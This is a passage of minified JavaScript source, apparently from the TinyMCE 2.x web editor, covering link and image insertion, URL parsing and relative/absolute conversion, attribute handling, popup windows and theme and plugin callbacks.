linkElement);");tinyMCE.setAttrib(linkElement,'href',href);tinyMCE.setAttrib(linkElement,'target',target);tinyMCE.setAttrib(linkElement,'title',title);tinyMCE.setAttrib(linkElement,'onclick',onclick);tinyMCE.setAttrib(linkElement,'class',style_class);if(newLink){linkElement.appendChild(this.selectedElement.cloneNode(true));this.selectedElement.parentNode.replaceChild(linkElement,this.selectedElement);}return;}if(!this.linkElement&&this.selectedInstance){if(tinyMCE.isSafari){tinyMCE.execCommand("mceInsertContent",false,'<a href="'+tinyMCE.uniqueURL+'">'+this.selectedInstance.getSelectedHTML()+'</a>');}else this.selectedInstance.contentDocument.execCommand("createlink",false,tinyMCE.uniqueURL);tinyMCE.linkElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);var elementArray=this.getElementsByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);for(var i=0;i<elementArray.length;i++){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, elementArray[i]);");tinyMCE.setAttrib(elementArray[i],'href',href);tinyMCE.setAttrib(elementArray[i],'mce_real_href',href);tinyMCE.setAttrib(elementArray[i],'target',target);tinyMCE.setAttrib(elementArray[i],'title',title);tinyMCE.setAttrib(elementArray[i],'onclick',onclick);tinyMCE.setAttrib(elementArray[i],'class',style_class);}tinyMCE.linkElement=elementArray[0];}if(this.linkElement){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, this.linkElement);");tinyMCE.setAttrib(this.linkElement,'href',href);tinyMCE.setAttrib(this.linkElement,'mce_real_href',href);tinyMCE.setAttrib(this.linkElement,'target',target);tinyMCE.setAttrib(this.linkElement,'title',title);tinyMCE.setAttrib(this.linkElement,'onclick',onclick);tinyMCE.setAttrib(this.linkElement,'class',style_class);}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.insertImage=function(src,alt,border,hspace,vspace,width,height,align,title,onmouseover,onmouseout){tinyMCE.execCommand('mceBeginUndoLevel');if(src=="")return;if(!this.imgElement&&tinyMCE.isSafari){var html="";html+='<img src="'+src+'" alt="'+alt+'"';html+=' border="'+border+'" hspace="'+hspace+'"';html+=' vspace="'+vspace+'" width="'+width+'"';html+=' height="'+height+'" align="'+align+'" title="'+title+'" onmouseover="'+onmouseover+'" onmouseout="'+onmouseout+'" />';tinyMCE.execCommand("mceInsertContent",false,html);}else{if(!this.imgElement&&this.selectedInstance){if(tinyMCE.isSafari)tinyMCE.execCommand("mceInsertContent",false,'<img src="'+tinyMCE.uniqueURL+'" />');else this.selectedInstance.contentDocument.execCommand("insertimage",false,tinyMCE.uniqueURL);tinyMCE.imgElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"img","src",tinyMCE.uniqueURL);}}if(this.imgElement){var needsRepaint=false;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, tinyMCE.imgElement);");if(onmouseover&&onmouseover!="")onmouseover="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, tinyMCE.imgElement);")+"';";if(onmouseout&&onmouseout!="")onmouseout="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, tinyMCE.imgElement);")+"';";if(typeof(title)=="undefined")title=alt;if(width!=this.imgElement.getAttribute("width")||height!=this.imgElement.getAttribute("height")||align!=this.imgElement.getAttribute("align"))needsRepaint=true;tinyMCE.setAttrib(this.imgElement,'src',src);tinyMCE.setAttrib(this.imgElement,'mce_real_src',src);tinyMCE.setAttrib(this.imgElement,'alt',alt);tinyMCE.setAttrib(this.imgElement,'title',title);tinyMCE.setAttrib(this.imgElement,'align',align);tinyMCE.setAttrib(this.imgElement,'border',border,true);tinyMCE.setAttrib(this.imgElement,'hspace',hspace,true);tinyMCE.setAttrib(this.imgElement,'vspace',vspace,true);tinyMCE.setAttrib(this.imgElement,'width',width,true);tinyMCE.setAttrib(this.imgElement,'height',height,true);tinyMCE.setAttrib(this.imgElement,'onmouseover',onmouseover);tinyMCE.setAttrib(this.imgElement,'onmouseout',onmouseout);if(width&&width!="")this.imgElement.style.pixelWidth=width;if(height&&height!="")this.imgElement.style.pixelHeight=height;if(needsRepaint)tinyMCE.selectedInstance.repaint();}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.getElementByAttributeValue=function(node,element_name,attrib,value){var elements=this.getElementsByAttributeValue(node,element_name,attrib,value);if(elements.length==0)return null;return elements[0];};TinyMCE.prototype.getElementsByAttributeValue=function(node,element_name,attrib,value){var elements=new Array();if(node&&node.nodeName.toLowerCase()==element_name){if(node.getAttribute(attrib)&&node.getAttribute(attrib).indexOf(value)!=-1)elements[elements.length]=node;}if(node&&node.hasChildNodes()){for(var x=0,n=node.childNodes.length;x<n;x++){var childElements=this.getElementsByAttributeValue(node.childNodes[x],element_name,attrib,value);for(var i=0,m=childElements.length;i<m;i++)elements[elements.length]=childElements[i];}}return elements;};TinyMCE.prototype.isBlockElement=function(node){return node!=null&&node.nodeType==1&&this.blockRegExp.test(node.nodeName);};TinyMCE.prototype.getParentBlockElement=function(node){while(node){if(this.blockRegExp.test(node.nodeName))return node;node=node.parentNode;}return null;};TinyMCE.prototype.getNodeTree=function(node,node_array,type,node_name){if(typeof(type)=="undefined"||node.nodeType==type&&(typeof(node_name)=="undefined"||node.nodeName==node_name))node_array[node_array.length]=node;if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)tinyMCE.getNodeTree(node.childNodes[i],node_array,type,node_name);}return node_array;};TinyMCE.prototype.getParentElement=function(node,names,attrib_name,attrib_value){if(typeof(names)=="undefined"){if(node.nodeType==1)return node;while((node=node.parentNode)!=null&&node.nodeType!=1);return node;}var namesAr=names.split(',');if(node==null)return null;do{for(var i=0;i<namesAr.length;i++){if(node.nodeName.toLowerCase()==namesAr[i].toLowerCase()||names=="*"){if(typeof(attrib_name)=="undefined")return node;else if(node.getAttribute(attrib_name)){if(typeof(attrib_value)=="undefined"){if(node.getAttribute(attrib_name)!="")return node;}else if(node.getAttribute(attrib_name)==attrib_value)return node;}}}}while((node=node.parentNode)!=null);return null;};TinyMCE.prototype.convertURL=function(url,node,on_save){var prot=document.location.protocol;var host=document.location.hostname;var port=document.location.port;var fileProto=(prot=="file:");url=tinyMCE.regexpReplace(url,'(http|https):///','/');if(url.indexOf('mailto:')!=-1||url.indexOf('javascript:')!=-1||tinyMCE.regexpReplace(url,'[ \t\r\n\+]|%20','').charAt(0)=="#")return url;if(!tinyMCE.isMSIE&&!on_save&&url.indexOf("://")==-1&&url.charAt(0)!='/')return tinyMCE.settings['base_href']+url;if(!tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var baseUrlParts=tinyMCE.parseURL(tinyMCE.settings['base_href']);if(urlParts['anchor']&&urlParts['path']==baseUrlParts['path'])return "#"+urlParts['anchor'];}if(on_save&&tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var tmpUrlParts=tinyMCE.parseURL(tinyMCE.settings['document_base_url']);if(urlParts['host']==tmpUrlParts['host']&&(!urlParts['port']||urlParts['port']==tmpUrlParts['port']))return tinyMCE.convertAbsoluteURLToRelativeURL(tinyMCE.settings['document_base_url'],url);}if(!fileProto&&tinyMCE.getParam('remove_script_host')){var start="",portPart="";if(port!="")portPart=":"+port;start=prot+"//"+host+portPart+"/";if(url.indexOf(start)==0)url=url.substring(start.length-1);if(!tinyMCE.getParam('relative_urls')&&url.indexOf('://')==-1&&url.charAt(0)!='/')url='/'+url;}return url;};TinyMCE.prototype.parseURL=function(url_str){var urlParts=new Array();if(url_str){var pos,lastPos;pos=url_str.indexOf('://');if(pos!=-1){urlParts['protocol']=url_str.substring(0,pos);lastPos=pos+3;}for(var i=lastPos;i<url_str.length;i++){var chr=url_str.charAt(i);if(chr==':')break;if(chr=='/')break;}pos=i;urlParts['host']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)==':'){pos=url_str.indexOf('/',lastPos);urlParts['port']=url_str.substring(lastPos+1,pos);}lastPos=pos;pos=url_str.indexOf('?',lastPos);if(pos==-1)pos=url_str.indexOf('#',lastPos);if(pos==-1)pos=url_str.length;urlParts['path']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)=='?'){pos=url_str.indexOf('#');pos=(pos==-1)?url_str.length:pos;urlParts['query']=url_str.substring(lastPos+1,pos);}lastPos=pos;if(url_str.charAt(pos)=='#'){pos=url_str.length;urlParts['anchor']=url_str.substring(lastPos+1,pos);}}return urlParts;};TinyMCE.prototype.serializeURL=function(up){var url="";if(up['protocol'])url+=up['protocol']+"://";if(up['host'])url+=up['host'];if(up['port'])url+=":"+up['port'];if(up['path'])url+=up['path'];if(up['query'])url+="?"+up['query'];if(up['anchor'])url+="#"+up['anchor'];return url;};TinyMCE.prototype.convertAbsoluteURLToRelativeURL=function(base_url,url_to_relative){var baseURL=this.parseURL(base_url);var targetURL=this.parseURL(url_to_relative);var strTok1;var strTok2;var breakPoint=0;var outPath="";var forceSlash=false;if(targetURL.path=="")targetURL.path="/";else forceSlash=true;base_url=baseURL.path.substring(0,baseURL.path.lastIndexOf('/'));strTok1=base_url.split('/');strTok2=targetURL.path.split('/');if(strTok1.length>=strTok2.length){for(var i=0;i<strTok1.length;i++){if(i>=strTok2.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(strTok1.length<strTok2.length){for(var i=0;i<strTok2.length;i++){if(i>=strTok1.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(breakPoint==1)return targetURL.path;for(var i=0;i<(strTok1.length-(breakPoint-1));i++)outPath+="../";for(var i=breakPoint-1;i<strTok2.length;i++){if(i!=(breakPoint-1))outPath+="/"+strTok2[i];else outPath+=strTok2[i];}targetURL.protocol=null;targetURL.host=null;targetURL.port=null;targetURL.path=outPath==""&&forceSlash?"/":outPath;return this.serializeURL(targetURL);};TinyMCE.prototype.convertRelativeToAbsoluteURL=function(base_url,relative_url){var baseURL=TinyMCE.prototype.parseURL(base_url);var relURL=TinyMCE.prototype.parseURL(relative_url);if(relative_url==""||relative_url.charAt(0)=='/'||relative_url.indexOf('://')!=-1||relative_url.indexOf('mailto:')!=-1||relative_url.indexOf('javascript:')!=-1)return relative_url;baseURLParts=baseURL['path'].split('/');relURLParts=relURL['path'].split('/');var newBaseURLParts=new Array();for(var i=baseURLParts.length-1;i>=0;i--){if(baseURLParts[i].length==0)continue;newBaseURLParts[newBaseURLParts.length]=baseURLParts[i];}baseURLParts=newBaseURLParts.reverse();var newRelURLParts=new Array();var numBack=0;for(var i=relURLParts.length-1;i>=0;i--){if(relURLParts[i].length==0||relURLParts[i]==".")continue;if(relURLParts[i]=='..'){numBack++;continue;}if(numBack>0){numBack--;continue;}newRelURLParts[newRelURLParts.length]=relURLParts[i];}relURLParts=newRelURLParts.reverse();var len=baseURLParts.length-numBack;var absPath=(len<=0?"":"/")+baseURLParts.slice(0,len).join('/')+"/"+relURLParts.join('/');var start="",end="";relURL.protocol=baseURL.protocol;relURL.host=baseURL.host;relURL.port=baseURL.port;if(relURL.path.charAt(relURL.path.length-1)=="/")absPath+="/";relURL.path=absPath;return TinyMCE.prototype.serializeURL(relURL);};TinyMCE.prototype.getParam=function(name,default_value,strip_whitespace,split_chr){var value=(typeof(this.settings[name])=="undefined")?default_value:this.settings[name];if(value=="true"||value=="false")return(value=="true");if(strip_whitespace)value=tinyMCE.regexpReplace(value,"[ \t\r\n]","");if(typeof(split_chr)!="undefined"&&split_chr!=null){value=value.split(split_chr);var outArray=new Array();for(var i=0;i<value.length;i++){if(value[i]&&value[i]!="")outArray[outArray.length]=value[i];}value=outArray;}return value;};TinyMCE.prototype.getLang=function(name,default_value,parse_entities){var value=(typeof(tinyMCELang[name])=="undefined")?default_value:tinyMCELang[name];if(parse_entities){var el=document.createElement("div");el.innerHTML=value;value=el.innerHTML;}return value;};TinyMCE.prototype.addToLang=function(prefix,ar){for(var key in ar){if(typeof(ar[key])=='function')continue;tinyMCELang[(key.indexOf('lang_')==-1?'lang_':'')+(prefix!=''?(prefix+"_"):'')+key]=ar[key];}};TinyMCE.prototype.replaceVar=function(replace_haystack,replace_var,replace_str){var re=new RegExp('{\\\$'+replace_var+'}','g');return replace_haystack.replace(re,replace_str);};TinyMCE.prototype.replaceVars=function(replace_haystack,replace_vars){for(var key in replace_vars){var value=replace_vars[key];if(typeof(value)=='function')continue;replace_haystack=tinyMCE.replaceVar(replace_haystack,key,value);}return replace_haystack;};TinyMCE.prototype.triggerNodeChange=function(focus,setup_content){if(tinyMCE.settings['handleNodeChangeCallback']){if(tinyMCE.selectedInstance){var inst=tinyMCE.selectedInstance;var editorId=inst.editorId;var elm=(typeof(setup_content)!="undefined"&&setup_content)?tinyMCE.selectedElement:inst.getFocusElement();var undoIndex=-1;var undoLevels=-1;var anySelection=false;var selectedText=inst.getSelectedText();if(tinyMCE.settings["auto_resize"]){var doc=inst.getDoc();inst.iframeElement.style.width=doc.body.offsetWidth+"px";inst.iframeElement.style.height=doc.body.offsetHeight+"px";}if(tinyMCE.selectedElement)anySelection=(tinyMCE.selectedElement.nodeName.toLowerCase()=="img")||(selectedText&&selectedText.length>0);if(tinyMCE.settings['custom_undo_redo']){undoIndex=inst.undoIndex;undoLevels=inst.undoLevels.length;}tinyMCE.executeCallback('handleNodeChangeCallback','_handleNodeChange',0,editorId,elm,undoIndex,undoLevels,inst.visualAid,anySelection,setup_content);}}if(this.selectedInstance&&(typeof(focus)=="undefined"||focus))this.selectedInstance.contentWindow.focus();};TinyMCE.prototype._customCleanup=function(inst,type,content){var customCleanup=tinyMCE.settings['cleanup_callback'];if(customCleanup!=""&&eval("typeof("+customCleanup+")")!="undefined")content=eval(customCleanup+"(type, content, inst);");var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){if(eval("typeof(TinyMCE_"+plugins[i]+"_cleanup)")!="undefined")content=eval("TinyMCE_"+plugins[i]+"_cleanup(type, content, inst);");}return content;};TinyMCE.prototype.getContent=function(editor_id){if(typeof(editor_id)!="undefined")tinyMCE.selectedInstance=tinyMCE.getInstanceById(editor_id);if(tinyMCE.selectedInstance){var old=this.selectedInstance.getBody().innerHTML;var html=tinyMCE._cleanupHTML(this.selectedInstance,this.selectedInstance.getDoc(),tinyMCE.settings,this.selectedInstance.getBody(),false,true);tinyMCE.setInnerHTML(this.selectedInstance.getBody(),old);return html;}return null;};TinyMCE.prototype.setContent=function(html_content){if(tinyMCE.selectedInstance){tinyMCE.selectedInstance.execCommand('mceSetContent',false,html_content);tinyMCE.selectedInstance.repaint();}};TinyMCE.prototype.importThemeLanguagePack=function(name){if(typeof(name)=="undefined")name=tinyMCE.settings['theme'];tinyMCE.loadScript(tinyMCE.baseURL+'/themes/'+name+'/langs/'+tinyMCE.settings['language']+'.js');};TinyMCE.prototype.importPluginLanguagePack=function(name,valid_languages){var lang="en";valid_languages=valid_languages.split(',');for(var i=0;i<valid_languages.length;i++){if(tinyMCE.settings['language']==valid_languages[i])lang=tinyMCE.settings['language'];}tinyMCE.loadScript(tinyMCE.baseURL+'/plugins/'+name+'/langs/'+lang+'.js');};TinyMCE.prototype.applyTemplate=function(html,args){html=tinyMCE.replaceVar(html,"themeurl",tinyMCE.themeURL);if(typeof(args)!="undefined")html=tinyMCE.replaceVars(html,args);html=tinyMCE.replaceVars(html,tinyMCE.settings);html=tinyMCE.replaceVars(html,tinyMCELang);return html;};TinyMCE.prototype.openWindow=function(template,args){var html,width,height,x,y,resizable,scrollbars,url;args['mce_template_file']=template['file'];args['mce_width']=template['width'];args['mce_height']=template['height'];tinyMCE.windowArgs=args;html=template['html'];if(!(width=parseInt(template['width'])))width=320;if(!(height=parseInt(template['height'])))height=200;if(tinyMCE.isMSIE)height+=40;else height+=20;x=parseInt(screen.width/2.0)-(width/2.0);y=parseInt(screen.height/2.0)-(height/2.0);resizable=(args&&args['resizable'])?args['resizable']:"no";scrollbars=(args&&args['scrollbars'])?args['scrollbars']:"no";if(template['file'].charAt(0)!='/'&&template['file'].indexOf('://')==-1)url=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/"+template['file'];else url=template['file'];for(var name in args){if(typeof(args[name])=='function')continue;url=tinyMCE.replaceVar(url,name,escape(args[name]));}if(html){html=tinyMCE.replaceVar(html,"css",this.settings['popups_css']);html=tinyMCE.applyTemplate(html,args);var win=window.open("","mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog=yes,minimizable="+resizable+",modal=yes,width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}win.document.write(html);win.document.close();win.resizeTo(width,height);win.focus();}else{if(tinyMCE.isMSIE&&resizable!='yes'&&tinyMCE.settings["dialog_type"]=="modal"){var features="resizable:"+resizable+";scroll:"+scrollbars+";status:yes;center:yes;help:no;dialogWidth:"+width+"px;dialogHeight:"+height+"px;";window.showModalDialog(url,window,features);}else{var modal=(resizable=="yes")?"no":"yes";if(tinyMCE.isGecko&&tinyMCE.isMac)modal="no";if(template['close_previous']!="no")try{tinyMCE.lastWindow.close();}catch(ex){}var win=window.open(url,"mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog="+modal+",minimizable="+resizable+",modal="+modal+",width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}if(template['close_previous']!="no")tinyMCE.lastWindow=win;eval('try { win.resizeTo(width, height); } catch(e) { }');if(tinyMCE.isGecko){if(win.document.defaultView.statusbar.visible)win.resizeBy(0,tinyMCE.isMac?10:24);}win.focus();}}};TinyMCE.prototype.closeWindow=function(win){win.close();};TinyMCE.prototype.getVisualAidClass=function(class_name,state){var aidClass=tinyMCE.settings['visual_table_class'];if(typeof(state)=="undefined")state=tinyMCE.settings['visual'];var classNames=new Array();var ar=class_name.split(' ');for(var i=0;i<ar.length;i++){if(ar[i]==aidClass)ar[i]="";if(ar[i]!="")classNames[classNames.length]=ar[i];}if(state)classNames[classNames.length]=aidClass;var className="";for(var i=0;i<classNames.length;i++){if(i>0)className+=" ";className+=classNames[i];}return className;};TinyMCE.prototype.handleVisualAid=function(el,deep,state,inst){if(!el)return;var tableElement=null;switch(el.nodeName){case "TABLE":var oldW=el.style.width;var oldH=el.style.height;var bo=tinyMCE.getAttrib(el,"border");bo=bo==""||bo=="0"?true:false;tinyMCE.setAttrib(el,"class",tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el,"class"),state&&bo));el.style.width=oldW;el.style.height=oldH;for(var y=0;y<el.rows.length;y++){for(var x=0;x<el.rows[y].cells.length;x++){var cn=tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el.rows[y].cells[x],"class"),state&&bo);tinyMCE.setAttrib(el.rows[y].cells[x],"class",cn);}}break;case "A":var anchorName=tinyMCE.getAttrib(el,"name");if(anchorName!=''&&state){el.title=anchorName;el.className='mceItemAnchor';}else if(anchorName!=''&&!state)el.className='';break;}if(deep&&el.hasChildNodes()){for(var i=0;i<el.childNodes.length;i++)tinyMCE.handleVisualAid(el.childNodes[i],deep,state,inst);}};TinyMCE.prototype.getAttrib=function(elm,name,default_value){if(typeof(default_value)=="undefined")default_value="";if(!elm||elm.nodeType!=1)return default_value;var v=elm.getAttribute(name);if(name=="class"&&!v)v=elm.className;if(name=="style"&&!tinyMCE.isOpera)v=elm.style.cssText;return(v&&v!="")?v:default_value;};TinyMCE.prototype.setAttrib=function(element,name,value,fix_value){if(typeof(value)=="number"&&value!=null)value=""+value;if(fix_value){if(value==null)value="";var re=new RegExp('[^0-9%]','g');value=value.replace(re,'');}if(name=="style")element.style.cssText=value;if(name=="class")element.className=value;if(value!=null&&value!=""&&value!=-1)element.setAttribute(name,value);else element.removeAttribute(name);};TinyMCE.prototype.setStyleAttrib=function(elm,name,value){eval('elm.style.'+name+'=value;');if(tinyMCE.isMSIE&&value==null||value==''){var str=tinyMCE.serializeStyle(tinyMCE.parseStyle(elm.style.cssText));elm.style.cssText=str;elm.setAttribute("style",str);}};TinyMCE.prototype.convertSpansToFonts=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<span/gi,'<font');h=h.replace(/<\/span/gi,'</font');doc.body.innerHTML=h;var s=doc.getElementsByTagName("font");for(var i=0;i<s.length;i++){var size=tinyMCE.trim(s[i].style.fontSize).toLowerCase();var fSize=0;for(var x=0;x<sizes.length;x++){if(sizes[x]==size){fSize=x+1;break;}}if(fSize>0){tinyMCE.setAttrib(s[i],'size',fSize);s[i].style.fontSize='';}var fFace=s[i].style.fontFamily;if(fFace!=null&&fFace!=""){tinyMCE.setAttrib(s[i],'face',fFace);s[i].style.fontFamily='';}var fColor=s[i].style.color;if(fColor!=null&&fColor!=""){tinyMCE.setAttrib(s[i],'color',tinyMCE.convertRGBToHex(fColor));s[i].style.color='';}}};TinyMCE.prototype.convertFontsToSpans=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<font/gi,'<span');h=h.replace(/<\/font/gi,'</span');doc.body.innerHTML=h;var fsClasses=tinyMCE.getParam('font_size_classes');if(fsClasses!='')fsClasses=fsClasses.replace(/\s+/,'').split(',');else fsClasses=null;var s=doc.getElementsByTagName("span");for(var i=0;i<s.length;i++){var fSize,fFace,fColor;fSize=tinyMCE.getAttrib(s[i],'size');fFace=tinyMCE.getAttrib(s[i],'face');fColor=tinyMCE.getAttrib(s[i],'color');if(fSize!=""){fSize=parseInt(fSize);if(fSize>0&&fSize<8){if(fsClasses!=null)tinyMCE.setAttrib(s[i],'class',fsClasses[fSize-1]);else s[i].style.fontSize=sizes[fSize-1];}s[i].removeAttribute('size');}if(fFace!=""){s[i].style.fontFamily=fFace;s[i].removeAttribute('face');}if(fColor!=""){s[i].style.color=fColor;s[i].removeAttribute('color');}}};TinyMCE.prototype.setInnerHTML=function(e,h){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){e.innerHTML='<div id="mceTMPElement" style="display: none">TMP</div>'+h;e.firstChild.removeNode(true);}else e.innerHTML=h;};TinyMCE.prototype.getOuterHTML=function(e){if(tinyMCE.isMSIE)return e.outerHTML;var d=e.ownerDocument.createElement("body");d.appendChild(e);return d.innerHTML;};TinyMCE.prototype.setOuterHTML=function(doc,e,h){if(tinyMCE.isMSIE){e.outerHTML=h;return;}var d=e.ownerDocument.createElement("body");d.innerHTML=h;e.parentNode.replaceChild(d.firstChild,e);};TinyMCE.prototype.insertAfter=function(nc,rc){if(rc.nextSibling)rc.parentNode.insertBefore(nc,rc.nextSibling);else rc.parentNode.appendChild(nc);};TinyMCE.prototype.cleanupAnchors=function(doc){var an=doc.getElementsByTagName("a");for(var i=0;i<an.length;i++){if(tinyMCE.getAttrib(an[i],"name")!=""){var cn=an[i].childNodes;for(var x=cn.length-1;x>=0;x--)tinyMCE.insertAfter(cn[x],an[i]);}}};TinyMCE.prototype._setHTML=function(doc,html_content){html_content=tinyMCE.cleanupHTMLCode(html_content);try{tinyMCE.setInnerHTML(doc.body,html_content);}catch(e){if(this.isMSIE)doc.body.createTextRange().pasteHTML(html_content);}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var paras=doc.getElementsByTagName("P");for(var i=0;i<paras.length;i++){var node=paras[i];while((node=node.parentNode)!=null){if(node.nodeName.toLowerCase()=="p")node.outerHTML=node.innerHTML;}}var html=doc.body.innerHTML;if(html.indexOf('="mso')!=-1){for(var i=0;i<doc.body.all.length;i++){var el=doc.body.all[i];el.removeAttribute("className","",0);el.removeAttribute("style","",0);}html=doc.body.innerHTML;html=tinyMCE.regexpReplace(html,"<o:p><\/o:p>","<br />");html=tinyMCE.regexpReplace(html,"<o:p> <\/o:p>","");html=tinyMCE.regexpReplace(html,"<st1:.*?>","");html=tinyMCE.regexpReplace(html,"<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p><\/p>\r\n<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p> <\/p>","<br />");html=tinyMCE.regexpReplace(html,"<p>\s*(<p>\s*)?","<p>");html=tinyMCE.regexpReplace(html,"<\/p>\s*(<\/p>\s*)?","</p>");}tinyMCE.setInnerHTML(doc.body,html);}tinyMCE.cleanupAnchors(doc);if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(doc);};TinyMCE.prototype.getImageSrc=function(str){var pos=-1;if(!str)return "";if((pos=str.indexOf('this.src='))!=-1){var src=str.substring(pos+10);src=src.substring(0,src.indexOf('\''));return src;}return "";};TinyMCE.prototype._getElementById=function(element_id){var elm=document.getElementById(element_id);if(!elm){for(var j=0;j<document.forms.length;j++){for(var k=0;k<document.forms[j].elements.length;k++){if(document.forms[j].elements[k].name==element_id){elm=document.forms[j].elements[k];break;}}}}return elm;};TinyMCE.prototype.getEditorId=function(form_element){var inst=this.getInstanceById(form_element);if(!inst)return null;return inst.editorId;};TinyMCE.prototype.getInstanceById=function(editor_id){var inst=this.instances[editor_id];if(!inst){for(var n in tinyMCE.instances){var instance=tinyMCE.instances[n];if(!tinyMCE.isInstance(instance))continue;if(instance.formTargetElementId==editor_id){inst=instance;break;}}}return inst;};TinyMCE.prototype.queryInstanceCommandValue=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandValue(command);return false;};TinyMCE.prototype.queryInstanceCommandState=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandState(command);return null;};TinyMCE.prototype.setWindowArg=function(name,value){this.windowArgs[name]=value;};TinyMCE.prototype.getWindowArg=function(name,default_value){return(typeof(this.windowArgs[name])=="undefined")?default_value:this.windowArgs[name];};TinyMCE.prototype.getCSSClasses=function(editor_id,doc){var output=new Array();if(typeof(tinyMCE.cssClasses)!="undefined")return tinyMCE.cssClasses;if(typeof(editor_id)=="undefined"&&typeof(doc)=="undefined"){var instance;for(var instanceName in tinyMCE.instances){instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;break;}doc=instance.getDoc();}if(typeof(doc)=="undefined"){var instance=tinyMCE.getInstanceById(editor_id);doc=instance.getDoc();}if(doc){var styles=tinyMCE.isMSIE?doc.styleSheets:doc.styleSheets;if(styles&&styles.length>0){for(var x=0;x<styles.length;x++){var csses=null;eval("try {var csses = tinyMCE.isMSIE ? doc.styleSheets("+x+").rules : doc.styleSheets["+x+"].cssRules;} catch(e) {}");if(!csses)return new Array();for(var i=0;i<csses.length;i++){var selectorText=csses[i].selectorText;if(selectorText){var rules=selectorText.split(',');for(var c=0;c<rules.length;c++){if(rules[c].indexOf(' ')!=-1||rules[c].indexOf(':')!=-1||rules[c].indexOf('mceItem')!=-1)continue;if(rules[c]=="."+tinyMCE.settings['visual_table_class'])continue;if(rules[c].indexOf('.')!=-1){output[output.length]=rules[c].substring(rules[c].indexOf('.')+1);}}}}}}}if(output.length>0)tinyMCE.cssClasses=output;return output;};TinyMCE.prototype.regexpReplace=function(in_str,reg_exp,replace_str,opts){if(in_str==null)return in_str;if(typeof(opts)=="undefined")opts='g';var re=new RegExp(reg_exp,opts);return in_str.replace(re,replace_str);};TinyMCE.prototype.trim=function(str){return str.replace(/^\s*|\s*$/g,"");};TinyMCE.prototype.cleanupEventStr=function(str){str=""+str;str=str.replace('function anonymous()\n{\n','');str=str.replace('\n}','');str=str.replace(/^return true;/gi,'');return str;};TinyMCE.prototype.getAbsPosition=function(node){var pos=new Object();pos.absLeft=pos.absTop=0;var parentNode=node;while(parentNode){pos.absLeft+=parentNode.offsetLeft;pos.absTop+=parentNode.offsetTop;parentNode=parentNode.offsetParent;}return pos;};TinyMCE.prototype.getControlHTML=function(control_name){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_getControlHTML";if(eval("typeof("+templateFunction+")")!='undefined'){var html=eval(templateFunction+"('"+control_name+"');");if(html!="")return tinyMCE.replaceVar(html,"pluginurl",tinyMCE.baseURL+"/plugins/"+themePlugins[i]);}}return eval('TinyMCE_'+tinyMCE.settings['theme']+"_getControlHTML"+"('"+control_name+"');");};TinyMCE.prototype._themeExecCommand=function(editor_id,element,command,user_interface,value){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined'){if(eval(templateFunction+"(editor_id, element, command, user_interface, value);"))return true;}}templateFunction='TinyMCE_'+tinyMCE.settings['theme']+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined')return eval(templateFunction+"(editor_id, element, command, user_interface, value);");return false;};TinyMCE.prototype._getThemeFunction=function(suffix,skip_plugins){if(skip_plugins)return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+suffix;if(eval("typeof("+templateFunction+")")!='undefined')return templateFunction;}return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;};TinyMCE.prototype.isFunc=function(func_name){if(func_name==null||func_name=="")return false;return eval("typeof("+func_name+")")!="undefined";};TinyMCE.prototype.exec=function(func_name,args){var str=func_name+'(';for(var i=3;i<args.length;i++){str+='args['+i+']';if(i<args.length-1)str+=',';}str+=');';return eval(str);};TinyMCE.prototype.executeCallback=function(param,suffix,mode){switch(mode){case 0:var state=false;var plugins=tinyMCE.getParam('plugins','',true,',');for(var 